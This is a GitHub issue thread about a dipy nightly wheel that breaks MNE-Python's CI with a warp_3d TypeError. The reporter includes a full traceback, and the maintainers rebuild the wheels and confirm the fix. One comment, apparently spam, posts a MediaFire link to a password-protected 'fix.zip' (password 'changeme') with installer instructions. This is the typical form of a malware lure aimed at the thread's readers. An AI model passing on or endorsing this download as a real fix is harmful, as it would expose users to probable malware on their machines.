### ISSUE TITLE
BUG: Bug with params

### ISSUE THREAD

**Issue by larsoner** [dipy/dipy#3339]
Using the `scientific-python-nightly-wheels` we get an error in CIs:

https://app.circleci.com/pipelines/github/mne-tools/mne-python/25117/workflows/e3848a23-a927-4ef0-80a0-a8993785df08/jobs/68321

I replicated this locally ([this](https://anaconda.org/scientific-python-nightly-wheels/dipy/files) `1` is me):

<img width="707" alt="Screenshot 2024-08-28 at 8 12 29 PM" src="https://github.com/user-attachments/assets/3c616639-f609-4756-8f02-902ab97a33b3">

Then went to replicate this using `master` and couldn't, though. So could you do a `workflow_dispatch` trigger of the `nightly` workflow to update the wheel?

FWIW we use the nightly because IIRC 1.9.0 on PyPI is not NumPy 2.0 compatible yet, so a release of a 1.9.1 would also work. But the `nightly` seems easier :)

<details>
<summary>Traceback</summary>

```
    ../examples/inverse/morph_volume_stc.py failed leaving traceback:

    Traceback (most recent call last):
      File "/home/circleci/project/examples/inverse/morph_volume_stc.py", line 85, in <module>
        morph = mne.compute_source_morph(
                ^^^^^^^^^^^^^^^^^^^^^^^^^
      File "<decorator-gen-483>", line 10, in compute_source_morph
      File "/home/circleci/project/mne/morph.py", line 259, in compute_source_morph
        shape, zooms, affine, pre_affine, sdr_morph = _compute_morph_sdr(
                                                      ^^^^^^^^^^^^^^^^^^^
      File "/home/circleci/project/mne/morph.py", line 1160, in _compute_morph_sdr
        ) = _compute_volume_registration(
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      File "/home/circleci/project/mne/transforms.py", line 1834, in _compute_volume_registration
        sdr_morph = sdr.optimize(
                    ^^^^^^^^^^^^^
      File "/home/circleci/python_env/lib/python3.12/site-packages/dipy/testing/decorators.py", line 208, in wrapper
        return convert_positional_to_keyword(func, args, kwargs)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      File "/home/circleci/python_env/lib/python3.12/site-packages/dipy/testing/decorators.py", line 187, in convert_positional_to_keyword
        return func(*positional_args, **corrected_kwargs)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      File "/home/circleci/python_env/lib/python3.12/site-packages/dipy/align/imwarp.py", line 1757, in optimize
        self._optimize()
      File "/home/circleci/python_env/lib/python3.12/site-packages/dipy/align/imwarp.py", line 1666, in _optimize
        derivative = self._iterate()
                     ^^^^^^^^^^^^^^^
      File "/home/circleci/python_env/lib/python3.12/site-packages/dipy/align/imwarp.py", line 1400, in _iterate
        wstatic = self.static_to_ref.transform_inverse(
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      File "/home/circleci/python_env/lib/python3.12/site-packages/dipy/testing/decorators.py", line 208, in wrapper
        return convert_positional_to_keyword(func, args, kwargs)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      File "/home/circleci/python_env/lib/python3.12/site-packages/dipy/testing/decorators.py", line 187, in convert_positional_to_keyword
        return func(*positional_args, **corrected_kwargs)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      File "/home/circleci/python_env/lib/python3.12/site-packages/dipy/align/imwarp.py", line 691, in transform_inverse
        warped = self._warp_backward(
                 ^^^^^^^^^^^^^^^^^^^^
      File "/home/circleci/python_env/lib/python3.12/site-packages/dipy/testing/decorators.py", line 208, in wrapper
        return convert_positional_to_keyword(func, args, kwargs)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      File "/home/circleci/python_env/lib/python3.12/site-packages/dipy/testing/decorators.py", line 187, in convert_positional_to_keyword
        return func(*positional_args, **corrected_kwargs)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      File "/home/circleci/python_env/lib/python3.12/site-packages/dipy/align/imwarp.py", line 582, in _warp_backward
        warped = warp_f(
                 ^^^^^^^
      File "/home/circleci/python_env/lib/python3.12/site-packages/dipy/testing/decorators.py", line 208, in wrapper
        return convert_positional_to_keyword(func, args, kwargs)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      File "/home/circleci/python_env/lib/python3.12/site-packages/dipy/testing/decorators.py", line 187, in convert_positional_to_keyword
        return func(*positional_args, **corrected_kwargs)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      File "dipy/align/vector_fields.pyx", line 1327, in dipy.align.vector_fields.warp_3d
    TypeError: warp_3d() takes exactly 2 positional arguments (5 given)
```

</details>

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by larsoner** [comment]
FYI looks like it tried to build wheels but failed on some of them actually

https://github.com/dipy/dipy/actions/runs/10587843101

But it should have used the ones from 9h ago I think

**Comment by skoudoro** [comment]
Hi @larsoner,

Thank you for the feedback, let me trigger one and if the build is still failing, I will work on a fix

**Comment by skoudoro** [comment]
I confirm the failure: https://github.com/dipy/dipy/actions/runs/10597544893

Not sure why we do not have this issue on our master CI's, and why linux or macosx build are not failing on the wheel CI's. 

Looking into it today

**Comment by skoudoro** [comment]
wheels are updated @larsoner. see here: https://github.com/dipy/dipy/actions/runs/10614539392

Thanks again for the feedback

**Comment by larsoner** [comment]
Indeed it seems to be fixed, thanks!
